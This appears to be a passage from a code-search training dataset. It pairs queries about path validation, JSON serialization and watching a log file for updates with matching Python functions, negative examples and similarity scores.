test_expand_path_1(self):\n partial_path = \"/fake/path\"\n input_path = \"~\" + partial_path\n expanded_path = basic.expand_path(input_path)\n home_dir = Path(\"~\").expanduser()\n expected_path = str(home_dir) + partial_path\n self.assertEqual(expanded_path, expected_path)", "def check_path(path):\n _base_path = \"build://project/\"\n all_ctx = path.replace(_base_path, \"\").split(\"/\")\n new_path = _base_path\n\n for ctx in all_ctx:\n new_path += (\"/\" + ctx)\n print(new_path)\n create_context(new_path)", "def startswith(self, base):\n if self.path_is_string:\n return self.path.startswith(base)\n if not self.path:\n return not bool(base)\n if self.path_type is list and len(self.path) is 1:\n return self.path[0].startswith(base)\n return self.joined().startswith(base)", "def normdirpath(path):\n if not path.endswith('/') and path != '':\n path += '/'\n return path", "def make_full_path(self, path, name):\n full_path = (path + \"/\" + name) if path != '' else name\n # remove any duplicate slashes\n full_path = re.sub(r'//+',r'/', full_path)\n self.validate_path(full_path)\n return full_path", "def test_valid_pathname(self):\n self.assertTrue(Util.is_pathname_valid('./myrandomvalidfilename.dat'))\n self.assertTrue(Util.is_pathname_valid('myrandomvalidfilename.dat'))", "def verify_restricted_path(self) -> None:\n path = \"/usr\"\n with self.assertRaises(NotFoundException):\n verify_file_path(path)", "def test_parse_url_path() -> None:\n assert indieauth._parse_url(\"http://ex.com\").path == \"/\"", "def test_sha1_from_path(self):\n self.assertEqual(TEST_SHA1, _get_sha1_from_path(TEST_SHA1))\n self.assertEqual(TEST_SHA1, _get_sha1_from_path('/' + TEST_SHA1))\n self.assertEqual(TEST_SHA1, _get_sha1_from_path('/test/' + TEST_SHA1))", "def test_verify_path_7(self):\n result = basic.verify_path(str(self.test_directory1), \"invalid\")\n self.assertFalse(result)", "def _check_filepath(self, filepath: str) -> None:\n base_dir = utils.vfs_construct_path('/', self.assets_path, 'assets')\n absolute_path = utils.vfs_construct_path(base_dir, filepath)\n normalized_path = utils.vfs_normpath(absolute_path)\n\n # This check prevents directory traversal.\n if not normalized_path.startswith(base_dir):\n raise IOError('Invalid filepath: %s' % filepath)", "def _sanitize_relative_path(self, path):\n last = None\n path = os.path.normpath(path)\n while path != last:\n last = path\n # Note: os.path.join treats '/' as os.sep on Windows\n path = path.lstrip(os.sep).lstrip('/')\n path = path.lstrip(os.pardir).lstrip('..')\n drive, path = os.path.splitdrive(path) # for Windows\n return path", "def clean_path(path):\n path = path.replace(\"~\", str(Path.home()))\n if path[-1] != \"/\":\n path += \"/\"\n return path", "def win_path_check(path):\n if IS_WIN:\n return path.replace(\"\\\\\", \"/\").replace(\":\", \"\\\\:\")\n return path", "def is_posix_path(my_path: str) -> bool:\n return \"/\" in str(my_path)", "def is_valid_path(input_path):\n if not os.path.exists(input_path):\n print('\\'{}\\' is not a valid path.'.format(input_path))\n exit(1)\n return input_path", "def verify_path(path):\n if path is None:\n sys.exit('Program terminated. 
You must specify a correct path.')\n path = Path(path)\n assert path.exists(), f'The specified path was not found: {path}.'\n return path", "def test_append_slash():\n assert normalize_url(\"http://example.com\") == \"http://example.com/\"", "def test_verify_path_6(self):\n result = basic.verify_path(str(self.test_directory1) + \"abcxyz\")\n self.assertFalse(result)", "def filesystem_path(domain, path):\n base = os.path.join(app.config['SITES_DIR'], domain) + '/'\n full = os.path.abspath(os.path.join(base, path))\n if not full.startswith(base) and base != full + '/':\n raise SecurityError(\"{0} is not in {1}\".format(full, base))\n return full", "def is_absolute_url(path):\n return path.startswith(\"http\")", "def test_expand_path_3(self):\n partial_path = \"/fake/path\"\n input_path = \".\" + partial_path\n expanded_path = basic.expand_path(input_path)\n local_path = Path(\".\").resolve()\n expected_path = str(local_path) + partial_path\n self.assertEqual(expanded_path, expected_path)", "def test_append_slash_have_slash(self):\n request = self.rf.get(\"/slash/\")\n self.assertIsNone(CommonMiddleware(get_response_404).process_request(request))\n self.assertEqual(CommonMiddleware(get_response_404)(request).status_code, 404)", "def test_expand_path_2(self):\n input_path = \"/fake/path\"\n expanded_path = basic.expand_path(input_path)\n expected_path = input_path\n self.assertEqual(expanded_path, expected_path)", "def prepare(self):\n if not self._base:\n self.error = \"path= must be specified\"\n return False\n if self._volume:\n if \"://\" not in self._volume:\n self.error = \"mount= can only be an URL\"\n return False\n if self._base.startswith(\"/\"):\n self._base = os.path.join(self._volume, self._base[1:])\n # do the prefix check anyway, for sanity\n if not is_parent_of(self._volume, self._base):\n self.error = \"mount= must be a prefix of path=\"\n return False\n return True", "def __post_init__(self) -> None:\n if self.is_directory and not self.path.endswith('/'):\n self.path += '/'", "def _validate_path(self, key, path):\n if path is None:\n raise TypeError(\"FileLink.path can not be None\")\n \n if not isinstance(path, (str, unicode)):\n raise TypeError(\"FileLink.path should be a str or unicode, \"\n \"not %s\" % path.__class__.__name__)\n return path", "def rpath(path):\n if path.startswith('/'):\n path = path[1:]\n return path", "def _check_filename(self, filename):\n if len(os.path.dirname(filename)) != 0:\n raise ValueError(f\"Expecting file name but got path {filename}\")", "def _trim_path(path):\n if path.endswith(\"/\"):\n path = path[:-1] # remove / at the end\n \n return path", "def is_posix_path3(my_path):\n return \"/\" in str(my_path)", "def guard(path):\n parts = list(path.parts)\n return guard_from_parts(parts[1:])", "def test_verify_path_4(self):\n result = basic.verify_path(str(self.test_directory1) + \"abcxyz\", \"dir\")\n self.assertFalse(result)", "def default_path(path):\r\n while path[len(path) - 1] == '/' or path[len(path) - 1] == '\\\\':\r\n path = path[0:-1]\r\n\r\n return path", "def _validate_path(self, path: str, is_file: bool) -> bool:\n is_valid_path = True\n if is_file and not os.path.isfile(path):\n is_valid_path = False\n elif not is_file and not os.path.isdir(path):\n is_valid_path = False\n if is_valid_path:\n logging.info('github_source_interceptor: Located path: ' + path)\n else:\n logging.error('github_source_interceptor: Could not locate path: ' + path)\n\n return is_valid_path", "def is_posix_path2(my_path):\n return \"/\" in str(my_path)", 
"def ends_with_slash_validator(string: str) -> None:\n if not string.endswith(\"/\"):\n raise ValidationError(\"The entered URL must end with a slash.\")", "def as_base(path):\n path = path if path.startswith('/') else '/' + path\n return path if path.endswith('/') else path + '/'", "def test_bad_paths(self):\n self.do_test_bad_path('frog', '/frog') # no permission to write", "def fix_path(self):\n paths = self.data['path'].tolist()\n prefixes = [re.findall(r'[A-Z\\-0-9]+', path) for path in paths]\n prefix_good = [str(prefix[0]) + \".json\" for prefix in prefixes]\n self.data['path'] = prefix_good", "def noTrailingSlash(path):\n return path.split('/')[0]", "def clean_path(self, path):\n if('.flaccuesplit.' in path):\n path, flaccue_details = path.split('.flaccuesplit.')\n if(path.startswith(self.mount)):\n # Strip off the mount point.\n path = path[len(self.mount):]\n return path", "def _path_parts(path):\n # clean it up. this removes duplicate '/' characters and any that may\n # exist at the front or end of the path.\n return [pp for pp in path.split(\"/\") if pp]", "def format_path(path):\n return path if path.endswith('/') else path + '/'", "def test_verify_path_5(self):\n result = basic.verify_path(str(self.test_directory1))\n self.assertTrue(result)", "def clean_path(path):\n return resolved_path(path)", "def validate_path(path, allow_whitespace=False,\n invalid_chars=[\":\", \"/\", \"\\\\\", \"*\", \"?\", \".\", \"%\", \"$\"]):\n if not allow_whitespace:\n from string import whitespace\n for char in whitespace:\n if char in path:\n raise Exception(\"Cannot contain whitespace.\")\n\n for char in invalid_chars:\n if char in path:\n raise Exception(\n \"Cannot contain {}.\".format(invalid_chars)\n )\n\n return path", "def test_client_id_path() -> None:\n assert indieauth._parse_client_id(\"http://ex.com\").path == \"/\"\n assert indieauth._parse_client_id(\"http://ex.com/hello\").path == \"/hello\"\n assert (\n indieauth._parse_client_id(\"http://ex.com/hello/.world\").path == \"/hello/.world\"\n )\n assert (\n indieauth._parse_client_id(\"http://ex.com/hello./.world\").path\n == \"/hello./.world\"\n )\n\n with pytest.raises(ValueError):\n indieauth._parse_client_id(\"http://ex.com/.\")\n\n with pytest.raises(ValueError):\n indieauth._parse_client_id(\"http://ex.com/hello/./yo\")\n\n with pytest.raises(ValueError):\n indieauth._parse_client_id(\"http://ex.com/hello/../yo\")", "def _NormalizePath(path: str) -> str:\n components = path.split(\"/\")\n normalized_components = [\n _NormalizePathComponent(component) for component in components\n ]\n if (normalized_components[1] == \"api\" and\n (len(normalized_components) == 2 or normalized_components[2] != \"v2\")):\n # We describe the v2 API in the OpenAPI description.\n normalized_components.insert(2, \"v2\")\n\n normalized_path = \"/\".join(normalized_components)\n if not normalized_path.startswith(\"/\"):\n normalized_path = \"/\" + normalized_path\n\n return normalized_path", "def verify_file_path(self) -> None:\n path = \"/data\"\n verify_file_path(path)", "def test_append_slash_disabled(self):\n request = self.rf.get(\"/slash\")\n self.assertEqual(CommonMiddleware(get_response_404)(request).status_code, 404)", "def ismount(path):\n return True if not get_instance(path).relpath(path) else False", "def validate_path(validation_context, path):\n\n return _validate_path(validation_context, path)", "def check_path(p, cwd):\n if not path.isabs(p):\n p = path.normpath(path.join(cwd,p))\n return p", "def test_empty(self):\n 
self.assertFalse(os.path.exists('/'))", "def qualify(path: str) -> str:\n if path.startswith(\"/\"):\n return f\"file://{path}\"\n else:\n return path", "def is_absolute_path(path: str) -> bool:\n # This is a rather weak test, may be enhanced if desired\n return \"//\" in path \\\n or \":\" in path \\\n or path.startswith(\"/\")", "def is_valid_path(path):\n if not os.path.exists(path):\n raise IOError(\"{path} is not a valid path\".format(path=path))\n if not os.access(path, os.R_OK):\n raise OSError(\"{path} is not a readable path\".format(path=path))", "def _normalize_path(path):\n\n i = 0\n for c in path:\n if c != \"/\":\n break\n i = i + 1\n\n if i:\n return path[(i - 1) :]\n\n return path", "def path_only(self):\n path = six.moves.urllib.parse.urlparse(self.path).path\n if path.endswith('/'):\n return path[:-1]\n else:\n return path", "def test_verify_path_1(self):\n result = basic.verify_path(self.test_filepath1, \"file\")\n self.assertTrue(result)", "def __clean_path(self, path):\n matches = re.finditer(r'\\%\\(.*?\\)[diouxXeEfFgGcrsa]', path)\n for _, match in enumerate(matches):\n pattern = match.group()\n path = path.replace(pattern, u'')\n pos = path.find(os.path.sep*2)\n if pos>=0:\n path = path[:pos+1]\n return path", "def normalize_upstream(path):\n if not path:\n return path\n if ':' not in path:\n return os.path.abspath(path)\n return path", "def is_valid_path(path):\r\n if not path:\r\n raise ValueError(f\"Invalid Path\")\r\n if os.path.isfile(path) and 'image' in filetype.guess(path).mime:\r\n return path\r\n else:\r\n raise ValueError(f\"Invalid Path {path}\")", "def test_fix_path(self):\n\n expected = \"hello\" + PyFunceble.directory_separator + \"world\" + PyFunceble.directory_separator # pylint: disable=line-too-long\n actual = Directory(\"/hello/world\").fix_path()\n\n self.assertEqual(expected, actual)\n\n actual = Directory(\"\\\\hello\\\\world\").fix_path()\n self.assertEqual(expected, actual)\n\n actual = Directory(\"hello\\\\world\").fix_path()\n self.assertEqual(expected, actual)\n\n actual = Directory(r\"hello\\world\").fix_path()\n self.assertEqual(expected, actual)\n\n actual = Directory(r\"hello/world/\").fix_path()\n self.assertEqual(expected, actual)" ]
[ "0.7186039", "0.71806985", "0.7127312", "0.71078247", "0.7051519", "0.69835657", "0.68522096", "0.6767365", "0.66817963", "0.6630477", "0.6626429", "0.6597407", "0.65462995", "0.64854527", "0.64659435", "0.64395905", "0.6419547", "0.63963103", "0.63918716", "0.63726133", "0.6370513", "0.63654417", "0.6359605", "0.63211846", "0.6317921", "0.62620324", "0.6260518", "0.6240475", "0.62391555", "0.62368137", "0.62218004", "0.6148585", "0.6146385", "0.6139157", "0.61225766", "0.61140996", "0.60976815", "0.60956156", "0.6092826", "0.6076153", "0.60715514", "0.6048538", "0.6044935", "0.6023365", "0.60210544", "0.6016631", "0.60074615", "0.5997735", "0.5986699", "0.5969342", "0.5968044", "0.59583765", "0.59512955", "0.5945436", "0.5944524", "0.59432656", "0.59387654", "0.59320354", "0.59113026", "0.5908886", "0.59024626", "0.5902326", "0.5895644", "0.5889471", "0.58891094", "0.5885593", "0.5880526", "0.58801204", "0.5875808", "0.58489937", "0.5835438", "0.5833162", "0.5822111", "0.5810495", "0.5782301", "0.5770445", "0.5768968", "0.5767512", "0.5765052", "0.57563287", "0.5753942", "0.5751678", "0.57497126", "0.5734445", "0.57259506", "0.57221323", "0.57201064", "0.5713447", "0.57109296", "0.57025784", "0.57013875", "0.5696451", "0.56961215", "0.5694892", "0.5692987", "0.56830096", "0.56822324", "0.5676408", "0.567597", "0.5667834" ]
0.7040683
5
serializes the python object into json string
def to_json(self, json_file):
    try:
        json.dump(self.container, open(json_file, 'w'), indent=4)
    except (FileNotFoundError, IOError) as err:
        print(err)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize(self, obj):\n return json.dumps(obj)", "def toJSON(cls, obj):\n return json.dumps(obj)", "def toJSON(object):\n\treturn json.dumps(object, ensure_ascii=False)", "def serialize(cls, obj):\n return json.dumps(obj, cls=CustomTypeEncoder)", "def encode_json(obj):\n\treturn json.dumps(obj)", "def to_string(self):\n return json.dumps(self.to_json(), cls=ObjectEncoder)", "def serialize(self) -> str:\n return json.dumps(self.__dict__)", "def to_json_string(my_obj):\n obj = j.dumps(my_obj)\n return obj", "def json_serialize(self):\n raise NotImplementedError('json_serialize must be overriden')", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def json_encode(obj):\n return json.dumps(obj)", "def jsonify(obj):\n raise NotImplementedError", "def to_json_string(my_obj):\n return (json.dumps(my_obj))", "def to_json_string(my_obj):\n return (json.dumps(my_obj))", "def serialize(self):\n return json.dumps(self.as_dict())", "def to_json_string(my_obj):\n\n return json.dumps(my_obj)", "def to_json(self, *args, **kwargs):\n return json.dumps(self.serialize(primitive=True), *args, **kwargs)", "def serialize(self, obj):\n pass", "def to_json(self):\n return json.dumps(self._asdict())", "def to_json(self, *args, **kwargs):\n return json.dumps(self.serialize(), *args, **kwargs)", "def to_json_string(my_obj):\n j_obj = json.dumps(my_obj)\n return j_obj", "def as_json(self):", "def _toJSON(self):\n\n return json.encode(self.__toJSON())", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def to_json(self) :\n return jsonpickle.encode(self)", "def to_json(self) -> str:\n return json.dumps(asdict(self))", "def jsonify(self):\n jsonObject = self.getJsonObject()\n return json.dumps(jsonObject)", "def SerializeObject(self, data):\n\n if isinstance(data,dict):\n serializad_data = json.dumps(data)\n else:\n serializad_data = json.dumps(data.__dict__)\n\n return serializad_data", "def json(self):\n class ExtendedJSONEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, datetime.date) or isinstance(obj, datetime.time):\n encoded_object = obj.isoformat()\n else:\n encoded_object = json.JSONEncoder.default(self, obj)\n return encoded_object\n\n obj = {\n 'operation': self.operation,\n 'version': self.version,\n 'language': self.language,\n 'identifiers': self.identifiers,\n 'store_execute': self.store_execute,\n 'status': self.status,\n 'lineage': self.lineage,\n 'inputs': dict((i, [inpt.json for inpt in self.inputs[i]]) for i in self.inputs),\n 'outputs': self.outputs,\n 'raw': self.raw\n }\n\n return json.dumps(obj, allow_nan=False, cls=ExtendedJSONEncoder)", "def __str__(self):\n return json.dumps(self.obj)", "def to_json_string(self) -> None:\n return json.dumps(dataclasses.asdict(self)) + \"\\n\"", "def serialize(obj):\n\n # if isinstance(obj, date):\n # serial = obj.isoformat()\n # return serial\n #\n # if isinstance(obj, time):\n # serial = obj.isoformat()\n # return serial\n\n return obj.to_json()", "def cls2json(self):\n return json.dumps(self.__dict__)", "def cls2json(self):\n return json.dumps(self.__dict__)", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return 
json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self):\n return json.dumps(self.serialize())", "def serialize(self) -> bytes:\n return json_dumps(self._to_dict()).encode()", "def serialize(self) -> bytes:\n return json_dumps(self._to_dict()).encode()", "def serialize(self) -> bytes:\n return json_dumps(self._to_dict()).encode()", "def tojson(self) -> ty.Text:\n return json.dumps(self.todict())", "def tojson(python_object):\n return json.JSONEncoder().encode(python_object)", "def to_json(obj: Any) -> str:\n return mark_safe(json.dumps(obj))", "def to_json(self, *args, **kwargs):\n data = self.to_dict()\n\n return json_util.dumps(data)", "def to_json(self):\n pass", "def to_json(self):\n return json.dumps(self.__dict__)", "def asJsonString(self):\n return json.dumps(self.asDict(), sort_keys=True)", "def json_serial(obj):\n if isinstance(obj, LegipyModel):\n return obj.to_json()\n elif isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n raise TypeError(\"Type {0} not serializable\".format(repr(type(obj))))", "def to_json_str(self):\n return simplejson.dumps(self.to_json(), sort_keys=True)", "def to_json(self):\n return json.dumps(self.for_json())", "def to_json(self) -> JSON:\n pass", "def toJSON(self):\n raise NotImplementedError()", "def to_json_string(self):\n\t\treturn json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + \"\\n\"", "def toJSON(self) -> str:\r\n try:\r\n _ = json.dumps(self.value)\r\n value = self.value\r\n except (TypeError, OverflowError):\r\n value = {}\r\n value['object_type'] = self.value.__class__.__name__\r\n if isinstance(self.value, RawData):\r\n type_str = '_{}__'.format(value['object_type'])\r\n for key, data in self.value.__dict__.items():\r\n value[key.replace(type_str, '')] = data\r\n else:\r\n type_str = '_{}'.format(value['object_type'])\r\n for key, data in self.value.__dict__.items():\r\n value[key.replace(type_str, '')] = data\r\n\r\n return json.dumps({'object_type' : 'RawData', 'version' : self.version,\r\n 'timestamp' : self.timestamp, 'label' : self.label,\r\n 'value' : value})", "def tojson(self):\n return json.dumps(self.jsonable())", "def jsonify(obj):\n d = model_to_dict(obj)\n return json.dumps(d, cls=LazyEncoder)", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n if isinstance(obj, complex):\n return str(obj)\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def to_json(self):\n return json.dumps(self.dict)", "def as_json(self):\n return json.dumps(self.as_dict())", "def as_json(self):\n return json.dumps(self.as_dict())", "def as_json(self):\n return json.dumps(self.as_dict())", "def json(self):\n robot_dict = self.robot_dict()\n target_dict = self.target_dict()\n json_str = '{'\n json_str = json_str + '\"robot_obj\" : ' + json.dumps(robot_dict) + \",\\n\"\n json_str = json_str + '\"target_obj\" : ' + json.dumps(target_dict) + \"\\n\"\n json_str = json_str + '}'\n return(json_str)", "def __str__(self):\n return json.dumps(self.to_dict())", "def to_json(self):\n return json.dumps(self.to_dict())", "def to_json(self):\n return json.dumps(self.to_dict())", "def 
json_serial(obj):\r\n\r\n\t\tif isinstance(obj,(datetime, date)):\r\n\t\t\treturn obj.isoformat()\r\n\t\traise TypeError (\"Type %s not serializable\" % type(obj))", "def to_json(self, **kwargs):\n return dumps(self, **kwargs)", "def to_json(self, obj):\n _dict = obj._to_dict()\n if ID not in _dict or _dict[ID] is None:\n _dict[ID] = str(uuid.uuid4())\n json_str = json.dumps(_dict, indent=4)\n return json_str", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return str(obj) #.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def serialize(self, obj):\n return obj", "def AsJsonString(self):\n return json.dumps(self.AsDict(), sort_keys=True)", "def toJson(self):\n return json.dumps(self.toDict(), default=str)", "def as_json_string(self):\n return json.dumps(self.as_dict(), sort_keys=True)", "def json(self):\n return json.dumps(self, default=lambda o: o.__dict__,\n sort_keys=True, indent=4)", "def pack(self, obj):\n # TODO: use a JSON encoder that handles more types?\n if obj is not None:\n return json.dumps(obj)", "def toJSONString(self):\n JSONObject = self.toDict()\n\n return json.dumps(JSONObject, ensure_ascii=False)", "def serialize(obj):\n return serialization_manager.serialize(obj)", "def json_dumps(self, obj: object) -> str:\n return json.dumps(obj, sort_keys=self.beautify, indent=4)", "def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__)", "def to_json(obj):\n\n return json.dumps(obj, indent=2, default=_generated_class_serializer)", "def json_friendly(self):", "def toJson(self):\n return json.dumps(self.toDict())", "def toJson(self):\n return json.dumps(self.toDict())", "def osl_encode2json(obj):\n\n content, bundle = osl_encode(obj, False)\n # encoding should not bundle!\n assert bundle == []\n\n return json.dumps(content)", "def as_json(self) -> str:\n return json.dumps(self, cls=_RecordingJSONEncoder)", "def EventToJSON(_object):\n return json.dumps(_object, default=jsonDefault)", "def to_string(self) -> str:\n return json.dumps(self.to_json())", "def to_string(self) -> str:\n return json.dumps(self.to_json())", "def to_json(self) -> str:\n return JSONEncoder().encode(vars(self))", "def to_init_json(self) -> JSON:\n pass" ]
[ "0.84162724", "0.82060945", "0.7896136", "0.7808678", "0.7746026", "0.7719003", "0.769862", "0.7666531", "0.7664871", "0.76284343", "0.76284343", "0.76284343", "0.76284343", "0.76254743", "0.7620307", "0.7614118", "0.7614118", "0.76006883", "0.7582615", "0.754739", "0.75353134", "0.75265926", "0.75207174", "0.7515635", "0.75130916", "0.7500792", "0.74952143", "0.74952143", "0.7469639", "0.7468795", "0.74552137", "0.74474394", "0.74405754", "0.74391973", "0.7414831", "0.74147797", "0.74019647", "0.74019647", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.73969865", "0.73902255", "0.73902255", "0.73902255", "0.7383914", "0.7364207", "0.73578256", "0.73549575", "0.73536545", "0.735169", "0.734026", "0.7335726", "0.7317221", "0.7307949", "0.7304009", "0.7293016", "0.7273679", "0.7249555", "0.7248599", "0.7214939", "0.7214209", "0.7204066", "0.7182805", "0.7182805", "0.7182805", "0.71798456", "0.7177786", "0.7177227", "0.7177227", "0.7174731", "0.7169615", "0.7169294", "0.7166318", "0.716465", "0.7163234", "0.7159844", "0.71578133", "0.71551365", "0.7154678", "0.7148767", "0.7147119", "0.7135922", "0.7132492", "0.7127893", "0.71257", "0.7115515", "0.7115515", "0.7114026", "0.71106994", "0.7106287", "0.7103491", "0.7103491", "0.70823324", "0.7081757" ]
0.0
-1
This function will watch the given file for any updates.
def watch(log_file):
    log_file.seek(0, os.SEEK_END)
    while True:
        line = LogParser.read_line(log_file)
        if not line:
            time.sleep(1)
            continue
        yield line
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def statusupdate(filepath):\n pass", "def watch(self):", "def watch_changes(directories):\n default_watcher.watch(directories)\n return default_watcher.get_notification_thread()", "def _file_watcher(self, filename, interval):\n fp = open(filename)\n\n line = \"\"\n while self._watch_file:\n partial_line = fp.readline()\n if len(partial_line) != 0:\n line += partial_line\n if line.endswith(\"\\n\"):\n yield line\n line = \"\"\n else:\n time.sleep(interval)\n\n fp.close()", "def watch_file(self, filename, track=1):\n\n self._watched_files.append(TailFollow(filename, track))", "def watch_for_file_changes(self, root_dir, callback):\n # type: (str, Callable[[], None]) -> None\n raise NotImplementedError(\"watch_for_file_changes\")", "def watch(filename):\n with open(filename) as log:\n # Move to the end of the file\n file_size = os.stat(filename)[6]\n log.seek(file_size)\n while True:\n last_location = log.tell()\n line = log.readline()\n if not line:\n time.sleep(0.1)\n log.seek(last_location)\n else:\n yield line", "def watch(self, *argv, **kwargs):\n pass", "def watch(self, callback):\n raise NotImplementedError", "def monitor(self, filename):\n self.do_tail(filename, 0)", "def wait_file_update(\n file_name: str,\n t0: float,\n label: str,\n t: float,\n ) -> None:\n\n # Loop until the file has been updated\n while 1:\n\n # See how recently the file has been updated\n t_mod = os.path.getmtime(file_name)\n\n # Break out of the loop if the file has been updated since the given time\n if t_mod > t0:\n\n break\n\n # Wait and check again\n else:\n wait(t, \"%s file to be updated...\" % label)\n\n return", "def _watchFolder(self):\n wm = pyinotify.WatchManager()\n wm.add_watch(self.gdocs_folder, pyinotify.IN_MODIFY, rec=True)\n \n handler = EventHandler(self)\n notifier = pyinotify.Notifier(wm, handler)\n \n print 'waiting for changes . . .'\n notifier.loop()", "def watch(self) -> None:\n raise NotImplementedError()", "def test_watch_file(mock_os, mock_time):\n # Our function will throw KeyboardInterrupt when called for the 2nd time,\n # ending the watching gracefully.This will help in testing the\n # watch_file function.\n call_count = [0]\n\n def func():\n call_count[0] = call_count[0] + 1\n if call_count[0] == 2:\n raise KeyboardInterrupt()\n\n # Instead of modifying any file, let's change the return value of\n # os.path.getmtime. 
Start with initial value of 0.\n mock_os.path.getmtime.return_value = 0\n\n t = threading.Thread(target=uflash.watch_file,\n args=('path/to/file', func))\n t.start()\n time.sleep(0.01)\n mock_os.path.getmtime.return_value = 1 # Simulate file change\n time.sleep(0.01)\n assert t.is_alive()\n assert call_count[0] == 1\n mock_os.path.getmtime.return_value = 2 # Simulate file change\n t.join()\n assert call_count[0] == 2", "def watch_file(self, path: Path) -> None:\n directory = path.parent\n logger.debug(\"Starting watch: %s\", path)\n with self.lock:\n if directory in self.directories:\n self.directories[directory].increment(path.name)\n return\n\n watch = self.observer.schedule(self.handler, str(directory))\n self.directories[directory] = self.AssetWatch(\n Counter({path.name: 1}), watch\n )", "def watch(self):\n wm = pyinotify.WatchManager()\n self.notifier = pyinotify.Notifier(wm, default_proc_fun=self.callback)\n wm.add_watch(self.directory, pyinotify.ALL_EVENTS)\n try:\n self.notifier.loop()\n except (KeyboardInterrupt, AttributeError):\n print_notification(\"Stopping\")\n finally:\n self.notifier.stop()\n self.terminate_processes()", "def watch(self):\n raise NotImplementedError()", "def start_watcher():\n while True:\n request_date = datetime.datetime.utcnow().strftime(\"%Y%m%d\")\n pull_request_from_remote(remote_files=\"*%s*\" % request_date)\n new_requests = check_for_new_request(request_date=request_date)\n if not new_requests:\n time.sleep(5)\n continue\n\n # noinspection PyTypeChecker\n for r in new_requests:\n print(\"Processing %s\" % r)\n try:\n ret = process_new_request(r, request_date=request_date,\n add2db=True)\n print(ret)\n except:\n os.system('cp -r %s /home/sedm/growth_marshal/archived/failed/'\n % r)\n os.system('cp -r %s /home/sedm/growth_marshal/archived/%s/' %\n (r, request_date))\n\n print(\"Waiting %ss before checking for new request\" % 5)\n time.sleep(5)", "def run_file_change(op_list_file):\n if os.path.exists(\"flag_change_file.txt\"):\n print(\n \"-----maybe op_file has changed, so don't need to change again------\"\n )\n else:\n run_multi_thread(op_list_file)", "def on_file_changed(self, path):\n\t\tpass", "async def async_update(self):\n self.update_file_path()", "def SetupFileWatcher(filename, cb):\n wm = pyinotify.WatchManager()\n handler = FileEventHandler(wm, filename, cb)\n asyncnotifier.AsyncNotifier(wm, default_proc_fun=handler)", "def update(self):\n while True:\n result = win32event.WaitForSingleObject(self._overlapped.hEvent, 0)\n if result == win32con.WAIT_OBJECT_0:\n self._num_bytes_returned = win32file.GetOverlappedResult(\n self._directory,\n self._overlapped,\n True\n )\n timestamp = datetime.datetime.fromtimestamp(\n datetime.datetime.utcnow().timestamp()\n )\n self._event_properties['Path'] = self._get_path()\n self._event_properties['FileName'] = self._get_file_name()\n self._event_properties['Timestamp'] = timestamp\n self._event_properties['EventType'] = self._get_event_type()\n self._set_watcher()\n break\n if result == win32con.WAIT_FAILED:\n self.close()\n raise FileMonitorError()", "def _update_version_watch(self, new_version, _):\n if new_version is None:\n self._stopped = True\n return False\n\n persistent_update_version = retry_data_watch_coroutine(\n self.version_node, self.update_version\n )\n main_io_loop = IOLoop.instance()\n main_io_loop.add_callback(persistent_update_version, new_version)", "async def _watch_status(self, job_id, job_paths):\n status_path = job_paths['status.json']\n\n watcher = aionotify.Watcher()\n 
watcher.watch(status_path, aionotify.Flags.CLOSE_WRITE)\n await watcher.setup(self.loop)\n try:\n while True:\n try:\n await self._read_status(job_id, job_paths)\n await watcher.get_event()\n self.logger.debug(f'Detected status change for job {job_id}')\n except concurrent.futures.CancelledError:\n # Break loop (likely normal exit through task cancellation)\n break\n except Exception: # pylint: disable=broad-except\n self.logger.exception(f'Exception while watching status of job {job_id}')\n finally:\n watcher.unwatch(status_path)\n watcher.close()", "def watch(self, path):\n path_obj = Path(path)\n if not path_obj.exists():\n raise FileObserverException(\"Can not observe non exist path\")\n\n self._observed_paths[path] = calculate_checksum(path)\n\n # Watchdog will observe the path's parent path to make sure not missing the event if the path itself got deleted\n parent_path = str(path_obj.parent)\n child_paths = self._watch_dog_observed_paths.get(parent_path, [])\n first_time = not bool(child_paths)\n if path not in child_paths:\n child_paths += [path]\n self._watch_dog_observed_paths[parent_path] = child_paths\n if first_time:\n self._observed_watches[parent_path] = self._observer.schedule(\n self._code_change_handler, parent_path, recursive=True\n )", "def run_version(watcher: inotify.adapters.Inotify, config: Config) -> None:\n for directory in config[\"directories\"]:\n make_dir(directory)\n\n for watch_job in config[\"watches\"]:\n if watch_job[\"type\"] == \"simple\":\n watch_job_simple = cast(ConfigSimpleValue, watch_job)\n watch_directory_recursively(watcher, watch_job_simple[\"path\"])\n elif watch_job[\"type\"] == \"regex\":\n watch_job_regex = cast(ConfigRegexValue, watch_job)\n watch_directory_recursively(watcher, watch_job_regex[\"base_path\"])\n else:\n logging.warning(f\"Unknown watch job type: {watch_job['type']}\")\n\n for _, type_names, path, filename in watcher.event_gen(yield_nones=False):\n filepath = os.path.join(path, filename)\n\n # print(f\"event: {type_names}, {path}, {filename}\")\n if \"IN_CREATE\" in type_names and \"IN_ISDIR\" in type_names: # Directory was created\n watcher.add_watch(filepath)\n logging.warning(f\"Watching new directory 